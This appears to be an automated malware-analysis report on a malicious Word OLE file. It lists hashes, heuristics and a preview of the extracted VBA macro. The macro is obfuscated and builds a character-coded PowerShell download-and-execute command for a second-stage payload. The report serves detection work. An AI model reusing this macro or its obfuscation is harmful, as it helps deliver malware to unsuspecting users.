Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 17af88154f827e97…

MALICIOUS

Office (OLE)

98.5 KB Created: 2018-06-13 17:10:00 Authoring application: Microsoft Office Word First seen: 2018-11-05
MD5: 7a6d63aa149799e4ae2fdda3f4bde03a SHA-1: 8eda3524abba979e302022dbc32a2a179cceea1c SHA-256: 17af88154f827e973a853041d0eb5f953924fe97b1c10b517d6e41bc9c4b4abc
62 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is an OLE document with a significant amount of slack space and detected VBA macros. The VBA macro attempts to construct a string using character codes, which is a common technique for obfuscating malicious commands or URLs. The constructed string 'HeLL ( [cHA' is likely the beginning of a command or URL used to download and execute a second-stage payload.

Heuristics 3

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 100,864 bytes but its declared streams total only 35,549 bytes — 65,315 bytes (65%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11835 bytes
SHA-256: f1a3432dbf04ed24f2faedab2f2cb0f5feed5ac0c72ddaa7942f0a3e07aa8b41
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "EndRLrICqC"
Function boCvXzpW()
On Error Resume Next
FfbjDv = Tan(3805)
Buaas = CDbl(khbiL)
qXIhk = Tan(68505)
ztIqj = CDbl(fwwuki * CDbl(wsRBSN + Int(IFSiz * Rnd(57503)) * zXTjzU * Log(51840 * mTtUV - wkEJi + Fix(51))))
jzuMGn = ZjDwH
JOqGzI = shKUOY
VSJpSnzNkz = "HeLL  ( [cHA" + "R[]](4 ,73" + " ,104 ,86,116,7" + "3 , 0,29" + " ,0" + " ,78 , 69 ,87 " + ", 13,79,6" + "6,74 ,69 ,67"
NzZPl = Tan(96289)
fBfLT = CDbl(HRDji)
zsWXwj = Tan(20353)
XYBzRL = CDbl(mrWra * CDbl(BirlI + Int(tNVtp * Rnd(61021)) * DHjHsn * Log(26504 * BqMzH - MLYth + Fix(51))))
QZLLt = OkoWG
NqAnf = AIjCzA
lFbYJnqHX = " ," + " 84 ,0 , " + "82,65 " + ", 78 ,68" + " ,7" + "9 ,77,27 " + ",4, 80," + "107 ,68," + " 75,101, "
vuLlL = Tan(16881)
KIrGM = CDbl(Oquiu)
FAOPN = Tan(92305)
OdXJsi = CDbl(NfCjdE * CDbl(DYdwjr + Int(SbMAAc * Rnd(59733)) * RLmuJ * Log(72002 * YkSDUv - aUMvjz + Fix(51))))
cApzL = jjwuH
YztdcX = mAsoFw
MEauIH = "66 ,0 , " + "29, 0 , 78 " + ",69 , " + "87, 13 ,79 ,6" + "6 , 74,69 ,67" + " , 84, 0,115 , " + "89 ," + " 83 ,84, 69, 77" + ", 1"
zLKXiw = Tan(79697)
vWFdo = CDbl(kAIjAU)
EDZCi = Tan(52277)
HMXls = CDbl(JBSTlJ * CDbl(KCfWEw + Int(wmQBf * Rnd(29433)) * UQSKFJ * Log(19326 * znmmPf - vIqndb + Fix(51))))
NcbzHm = jadAm
DsjRj = WqHLs
WiMJCrbEs = "4 ,110,69 ,84," + " 14,119, 69" + " ," + " 6" + "6 ,99, 76, " + "73" + ",69 , 78,84," + "27 ,4 , 73," + "66 , 7" + "9, 86 ,65 , 8"
QEMOlD = Tan(50866)
kQwLc = CDbl(ifJHO)
JchMX = Tan(8205)
LLTHT = CDbl(EinKN * CDbl(XkYlXc + Int(lCAaDJ * Rnd(15640)) * hvHBFc * Log(20565 * BudjPi - PGTRDG + Fix(51))))
TDRjIa = pvzKmJ
qXrtt = HNlUj
NltOwKzLjz = "4, 0, 29 ,0 , 7" + ",72 ,84, 84, " + "80, 26 ,15 ," + " 15 , 8" + "7, " + "87, 87 , 14," + "77, 85 ,"
EbPmfU = Tan(87172)
kGmDUT = CDbl(PkXtJQ)
lwJiI = Tan(97616)
CqPtR = CDbl(nCQrZQ * CDbl(GGBHwA + Int(NJGIHN * Rnd(27919)) * XAHCX * Log(44855 * NMVUwj - oPIzwY + Fix(51))))
GiQdf = mGFjz
plbDIW = qzHQp
FjYTcszV = " 83,65 ,83" + ", 72 ,73 , 83 " + ",72 , 73, 78" + ", 74 ,7" + "9 ,13 , 83,72" + " ,73,75 ,65 " + ", 14,67 , 79"
boCvXzpW = VSJpSnzNkz + lFbYJnqHX + MEauIH + WiMJCrbEs + NltOwKzLjz + FjYTcszV
End Function
Function PaPPH()
On Error Resume Next
mCzTO = Tan(47239)
MJXDD = CDbl(bisdJ)
MshbC = Tan(76791)
ZwMii = CDbl(cXtGfm * CDbl(RsNmDi + Int(TPjCKb * Rnd(92307)) * vLOBd * Log(65888 * qpPoPw - jzDizv + Fix(51))))
cFiRcM = ZflFn
oCXXPP = tjkzjd
OAbwSjjJw = ", 77 ,15 " + ", 87 ," + " 80" + " ,15,8" + "7 , 80 ,"
qjSha = Tan(51112)
Amswpo = CDbl(Fzwwk)
JEHlw = Tan(41965)
RoVSM = CDbl(ucbKr * CDbl(CarPK + Int(jBUYs * Rnd(61013)) * CJufda * Log(22431 * tZvzOO - ArBVz + Fix(51))))
TdfrlM = wAHZUB
zJAwRw = WBdXWf
YCwiwIClPkw = " 13, 67 ,79,78" + ",84, 69,78 " + ",84 ,15, 84 " + ",72 , 69" + " ," + "77" + " ,69,83 ,15, 7" + "3, 75, 116," + " 121, 90, 106,1" + "5 ,96 ,72 ,84"
sEnuh = Tan(8290)
rzkNJ = CDbl(vwwZBn)
CnGosm = Tan(10131)
NADKT = CDbl(jOwIV * CDbl(JXQAL + Int(RfFWB * Rnd(37307)) * KWkPBj * Log(38116 * MDsAca - XLdzLZ + Fix(51))))
bHhwHZ = HAuDl
TYzicj = usCHX
TwiDBwjT = " ,84, " + "80 ,26 , 15," + "15, 17 " + ", 24 " + ",21,14 , " + "18 , 24,"
TwJMr = Tan(64779)
AckYmE = CDbl(RmnUf)
sdXwr = Tan(81784)
zjPHFP = CDbl(zTzwc * CDbl(wKwpki + Int(GzHii * Rnd(36678)) * jfhLc * Log(94279 * MjhBHb - jiMwna + Fix(51))))
wLtQPQ = cMjZK
jbRnc = oXVvi
GQsnSvAnHqX = "14 ,18 , 18 " + ", 14 ,17,19" + ", 17," + "15,23" + " ,"
sroBJP = Tan(70440)
tiZNz = CDbl(ZLAXBB)
tAaJbA = Tan(27620)
HWkRMj = CDbl(kCHfh * CDbl(cuNhQ + Int(YjZzXT * Rnd(40545)) * IkiGd * Log(42625 * nVGWp - vzEwh + Fix(51))))
GMHwd = WJRrY
zpYGK = DdjUzq
nMSOiB = " 72, 1" + "09 , 1" + "08 , 1" + "10 ," + "84,25,22 , 7" + "0 "
bJhbDF = Tan(29323)
AsaLb = CDbl(ojvIdY)
XVWhkG = Tan(48815)
wLCCR = CDbl(LXJNZ * CDbl(DQPdZ + Int(vmpkj * Rnd(53417)) * ldCtk * Log(76016 * Kiiwf - ljEwC + Fix(51))))
MFwtZ = Ajzhwf
WMZlR = AiPiqh
NhbsvlPFpkj = ", 15,96 ,72 ,8" + "4 , 84" + ",80,26 ," + "15 , 1" + "5,87, 87 ,87 ,"
EsOwSn = Tan(21880)
NbdYPH = CDbl(FXOaK)
oolFiR = Tan(36363)
IwwTI = CDbl(fkKji *
... (truncated)